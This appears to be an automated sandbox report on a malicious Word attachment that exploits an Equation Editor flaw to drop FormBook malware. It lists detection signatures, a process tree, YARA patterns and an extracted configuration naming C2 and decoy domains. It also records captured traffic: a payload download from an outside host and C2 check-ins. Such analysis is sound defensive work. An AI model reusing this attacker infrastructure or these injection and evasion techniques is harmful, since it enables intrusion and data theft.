Windows Analysis Report P.O-5433ERE.doc

Overview

General Information

Sample Name: P.O-5433ERE.doc
Analysis ID: 528734
MD5: 17ca06000e92058f0d43259b2683537c
SHA1: db453e5125310d209fe04fb0211677d79d25f3ee
SHA256: 3c9280552a4129fdf884414b080c80d5ffc72403079d7a5292e9b09d832ab37d
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1516 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2812 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ashlkyvc7592.exe (PID: 1528 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
      • ashlkyvc7592.exe (PID: 836 cmdline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe MD5: D236BB1F86CAEC110ABB20FC2360E25B)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmstp.exe (PID: 2580 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 00263CA2071DC9A6EE577EB356B0D1D9)
            • cmd.exe (PID: 2176 cmdline: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fcusd4.com/op9t/"], "decoy": ["tzjwt261888.com", "top10iecasinos.com", "nurotag.com", "controlparental24.com", "truenettnpasumo1.xyz", "finsits.com", "publicfigure.skin", "natalispharma.com", "brixbol.com", "bal.group", "perfectinteractivemedia.com", "fascialboost.com", "jgcpfb120.com", "grizzlysolutionsllc.net", "wearegardenersusa.com", "rjsarka.com", "shintoku-gsfarm.com", "1oavyx.com", "volunteervabetweenk.com", "tdshawn.com", "bandhancustomer.com", "amyzingskin.com", "sorbetsa.com", "eadbrasil.club", "directnaukri.com", "alltheheads.com", "elbbinandnibble.online", "kaizenswinger.com", "kimberleydawnwallace.com", "zscyyds.xyz", "ecranthermique.com", "mystitched.com", "shophallows.com", "cachondearais.xyz", "flavatdvb.quest", "christendombiblecollege.com", "affordalbehousing.com", "engro-connect.com", "lorticepttoyof2.xyz", "kingslot.bet", "wiseriq.com", "emmaraducanu.tennis", "xn--seebhnegrlitz-pmb9f.com", "perfectstudio.net", "thenewera.icu", "com104940689794.icu", "imaginative-coaching.com", "campdiscount.info", "waggledance.net", "excellglobus.com", "fssqyd.com", "yalesi.net", "aoliutech.com", "replenish.place", "nityammed.com", "stanislauscountyedu.info", "029saxjy.com", "lttcp089.com", "texaszephyr.com", "sloanlakecomedy.com", "axonlang.com", "bhutaan.com", "sevensummitclimbing.com", "wolfenhawk.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.0.ashlkyvc7592.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.ashlkyvc7592.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.ashlkyvc7592.exe.400000.8.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
5.0.ashlkyvc7592.exe.400000.10.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.ashlkyvc7592.exe.400000.10.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 37.0.9.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, NewProcessName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2812, ProcessCommandLine: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe, ProcessId: 1528
Sigma detected: CMSTP Execution Process Creation
Source: Process started | Author: Nik Seetharaman | Data: Command: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 2580, ProcessCommandLine: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe", ProcessId: 2176

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr | Stream path '_1699368849/\x1CompObj' : ...........................F....Microsoft Equation
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb | source: ashlkyvc7592.exe, ashlkyvc7592.exe, 00000005.00000003.424164499.00000000007B0000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000003.425110861.0000000000910000.00000004.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, ashlkyvc7592.exe, 00000005.00000002.462140612.0000000000C20000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000003.462746039.0000000001E70000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000003.461709967.00000000004F0000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.686830161.0000000002180000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb | source: ashlkyvc7592.exe, 00000005.00000002.461894500.00000000006D9000.00000004.00000020.sdmp, ashlkyvc7592.exe, 00000005.00000002.461761536.00000000003E0000.00000040.00020000.sdmp
Source: global traffic | DNS query: name: dell-tv.tk
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop esi
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 37.0.9.166:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 144.91.75.9:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.texaszephyr.com
Source: C:\Windows\explorer.exe | Domain query: www.bandhancustomer.com
Source: C:\Windows\explorer.exe | Domain query: www.publicfigure.skin
Source: C:\Windows\explorer.exe | Network Connect: 172.67.184.102 80
Source: C:\Windows\explorer.exe | Domain query: www.volunteervabetweenk.com
Source: C:\Windows\explorer.exe | Domain query: www.1oavyx.com
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.fcusd4.com/op9t/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: WKD-ASIE WKD-ASIE
Source: global traffic | HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1 | Host: www.texaszephyr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1 | Host: www.publicfigure.skin | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1 | Host: www.volunteervabetweenk.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 37.0.9.166 37.0.9.166
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Thu, 25 Nov 2021 17:08:39 GMT | Content-Type: application/x-msdownload | Content-Length: 560128 | Last-Modified: Thu, 25 Nov 2021 01:30:41 GMT | Connection: keep-alive | ETag: "619ee741-88c00" | Accept-Ranges: bytes
Source: global traffic | HTTP traffic detected: GET /ashlyzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: dell-tv.tk | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 17:10:32 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be75c-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 17:10:37 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be75c-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 25 Nov 2021 17:10:43 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | vary: Accept-Encoding | cache-control: no-cache | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 6b3c7df37c1c4230-AMS | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Raw: 30 0d 0a 0d 0a | Data Ascii: 0
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico95
Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438482081.000000000844F000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.453053501.000000000844F000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoICROS~4.LNK
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
